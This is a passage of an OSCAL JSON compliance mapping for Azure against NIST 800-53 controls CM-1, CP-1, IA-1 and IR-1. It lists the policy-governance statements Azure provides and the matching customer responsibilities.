statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8b20c0a9-54cf-4522-922e-c8c3c3bec4e3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-1","statements":[{"uuid":"33d69cee-d40e-4954-8fed-1e6fc83058f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.a","by-components":[{"uuid":"0cdc5579-920a-445f-8212-46dd818e2e52","export":{"provided":[{"uuid":"1f822e43-c9c8-4389-8eea-054b5cb1394e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"}],"description":"Azure addresses the configuration management policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. The MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Purpose of providing rules and requirements to applicable personnel * Scope covering properties and services * Roles and responsibilities for those involved with the policy * Management commitment through coordination with security organizations, property security groups, and Microsoft corporate functions * Compliance by requiring all employees to adhere to the policy and applicable standards and follow approved procedures Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with configuration management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nAzure implements the configuration management policy and associated controls through the following documents: * Azure Security Baseline Governance Standard Operating Procedure (SOP) * Azure Asset Management Standard Operating Procedure (SOP) * Azure Hardware Change and Release Management Standard Operating Procedure (SOP) * Azure Software Change and Release Management Standard Operating Procedure (SOP) * Microsoft Change Management Standard * Microsoft Security Standards * Microsoft Online Services Baseline Security Configuration Document They document the following configuration management procedures: * Change control documentation, maintenance, retention, and approvals * Configuration baselines * Component inventory * Configuration settings * Segregation of duties for change management activities * Asset classification Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with configuration management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"dab95d93-7e91-4414-aa34-45652b63ef7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-001"}],"description":"The customer is responsible for developing, documenting, and disseminating configuration management policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the configuration management policy and the associated configuration management controls.","provided-uuid":"1f822e43-c9c8-4389-8eea-054b5cb1394e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"20304f8d-5bad-4b63-a682-f0fd22ce67dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.b","by-components":[{"uuid":"652900f0-0748-4774-86c4-41da0765908f","export":{"provided":[{"uuid":"c93d06b7-febb-42d3-9df2-70c9fc938c9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"03b4720f-f1f4-42f9-8f02-dd6e787cfa4f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the configuration management policy and procedures.","provided-uuid":"c93d06b7-febb-42d3-9df2-70c9fc938c9d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4da2a642-a424-4b99-bbd7-ef4953b6e65c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-1_smt.c","by-components":[{"uuid":"5c302e7a-914a-42ef-805b-a37cf86321a4","export":{"provided":[{"uuid":"a9bd30e8-32bc-490f-aaef-168d8c22e767","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"5bfbd331-4832-4d52-a1ff-5368fd0f092a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-004"}],"description":"The customer is responsible for reviewing and updating the current configuration management policy on a regular basis and following organization defined events.","provided-uuid":"a9bd30e8-32bc-490f-aaef-168d8c22e767"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f549b7da-7c1e-4f2a-8d56-22465b245924","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-1","statements":[{"uuid":"e696344b-e669-426d-94a3-3a603212ee77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.a","by-components":[{"uuid":"53b6032e-7c66-47f1-a4a8-0f2ff8d8bee5","export":{"provided":[{"uuid":"f0164b65-588f-45c4-820c-3bdc48e056fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"}],"description":"Azure addresses the contingency planning policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Business continuity process * Alternate systems facilities * Service resiliency Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. The Azure BCM System Manual is maintained in the Azure Business Continuity and Disaster Recovery (BCDR) website on the Microsoft intranet. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with contingency planning are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Business Continuity and Disaster Recovery Standard Operating Procedure (SOP) implements the contingency planning policy and associated controls. Azure also implements policy and procedures through the Business Continuity Management (BCM) System Manual managed by the C+AI Azure Business Continuity Management team. The purpose of this manual is to document the BCM methods and approach to be implemented by Azure services, internal Azure groups, and support functions. It defines the purpose of the program and sets forth the drivers, goals, objectives, and strategies that are used as guiding principles. The BCM program is in alignment with those of Microsoft's Enterprise Business Continuity Management (EBCM) Program. The SOP and BCM System Manual document the following procedures: * Continuity management process * Business impact and dependency analysis * Writing and implementing continuity plans * Continuity planning framework Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with contingency planning are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"15e44393-d399-45ee-ace9-14e108b58460","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-001"}],"description":"The customer is responsible for developing, documenting, and disseminating contingency planning policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the contingency planning policy and the associated configuration management controls.","provided-uuid":"f0164b65-588f-45c4-820c-3bdc48e056fa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2f099faf-4c62-4ca9-be80-57dbfc1a15ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.b","by-components":[{"uuid":"35dd26ed-828f-4f00-ae09-c4f04a0d2d10","export":{"provided":[{"uuid":"8ced1475-5aaa-41b2-a812-5bd6adc7a166","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"bc1feef5-3820-455c-975d-a751f8fd79ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the contingency planning policy and procedures.","provided-uuid":"8ced1475-5aaa-41b2-a812-5bd6adc7a166"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b127ab8b-fba6-44e6-b134-532c6e94c8f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cp-1_smt.c","by-components":[{"uuid":"0bc7d196-db8b-4ffe-9c66-e2a98a3ad7cf","export":{"provided":[{"uuid":"12875cf8-753e-4cf4-a460-f2875637467d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"78547d60-1b74-4f05-b1d0-14d8826a0959","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-004"}],"description":"The customer is responsible for reviewing and updating the current contingency planning policy on a regular basis and following organization defined events.","provided-uuid":"12875cf8-753e-4cf4-a460-f2875637467d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"18339a10-d499-41ec-9d65-2a4cec63f876","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-1","statements":[{"uuid":"864d24c1-ea92-4fb9-8815-7ccee431f616","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.a","by-components":[{"uuid":"99e1c490-0484-490e-9f70-446879cae695","export":{"provided":[{"uuid":"550e6a5d-418b-402d-9d11-b775798ff692","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"}],"description":"Azure addresses the identification and authentication policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Identification and authentication of users and components * Unique identifiers * Default user accounts Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. Part 2: The Azure Access Control Standard Operating Procedure (SOP) and the Azure Cryptographic Controls SOP implement the identification and authentication policy and associated controls and documents the following procedures: * Identifier management * Authenticator management * User identification and authentication * User authorization * Device identification and authentication * Key management Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nAzure addresses the identification and authentication policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Identification and authentication of users and components * Unique identifiers * Default user accounts Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. Part 2: The Azure Access Control Standard Operating Procedure (SOP) and the Azure Cryptographic Controls SOP implement the identification and authentication policy and associated controls and documents the following procedures: * Identifier management * Authenticator management * User identification and authentication * User authorization * Device identification and authentication * Key management Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with identification and authentication are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"8c4c1681-6c51-4d06-a62b-9d9a6c880877","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-001"}],"description":"The customer is responsible for developing, documenting, and disseminating identification and authentication policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. The customer is responsible for procedures to facilitate the implementation of the identification and authentication policy and the associated identification and authentication controls. \nThe customer is responsible for developing, documenting, and disseminating identification and authentication policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. The customer is responsible for procedures to facilitate the implementation of the identification and authentication policy and the associated identification and authentication controls.","provided-uuid":"550e6a5d-418b-402d-9d11-b775798ff692"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c65e8ff4-551a-4dcd-b20d-62e8b3e50b72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.b","by-components":[{"uuid":"d1a0df03-78c7-48e9-be52-1da75c780ed5","export":{"provided":[{"uuid":"31acebc4-82be-4e0c-b98d-ec5c7825a14e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"ade6993c-1882-4771-b449-a29661ee18c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the identification and authentication policy and procedures.","provided-uuid":"31acebc4-82be-4e0c-b98d-ec5c7825a14e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"da47bdb7-5ae8-4125-bd36-6f66e4a6fe4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-1_smt.c","by-components":[{"uuid":"26471866-f11e-4f78-bfe1-d90f385217b7","export":{"provided":[{"uuid":"a4fdec1f-45d9-4b64-b422-acede3cfcf34","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"6705e052-7a40-4fdb-8d96-2774c7f3da3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-004"}],"description":"The customer is responsible for reviewing and updating the current identification and authentication policy on a regular basis and following organization defined events.","provided-uuid":"a4fdec1f-45d9-4b64-b422-acede3cfcf34"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6339599b-c437-46d2-a3c4-ef7594820974","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-1","statements":[{"uuid":"2836287c-9486-4293-9860-63eda7f055eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.a","by-components":[{"uuid":"c0c4b9c5-17e5-4f99-8c44-3778ab854a25","export":{"provided":[{"uuid":"ca68766c-818c-478e-9a83-e7fd8e08b099","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"}],"description":"Azure addresses the incident management policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all personnel involved in designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Incident management * Procedures and training * Incident evidence * Incident management capabilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with incident management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Incident Management Standard Operating Procedure (SOP) implements the incident management policy and associated controls and documents the following procedures: * Notification processes * Security incident data collection and analysis processes * A security incident documentation template and repository * An internal and external communication plan * Recovery procedures for system failures, data corruption, loss or denial of service, and total service compromise incidents * A process for post-mortem analysis Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with incident management are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f00bc434-f500-4251-b8a4-ba44c15046b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-001"}],"description":"The customer is responsible for developing, documenting, and disseminating incident response policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the incident response policy and the associated incident response controls.","provided-uuid":"ca68766c-818c-478e-9a83-e7fd8e08b099"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cb91554a-9065-4172-91b7-0b5f38df9561","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.b","by-components":[{"uuid":"ff742bd8-8d81-47a2-842c-744d70c5f507","export":{"provided":[{"uuid":"e668c0b3-02af-49d3-ae11-2f08d376690c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"05a2d8b1-81b3-4917-bf7e-766973e3d360","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the incident response policy and procedures.","provided-uuid":"e668c0b3-02af-49d3-ae11-2f08d376690c"}]},"description":"See inheritance and customer responsibility 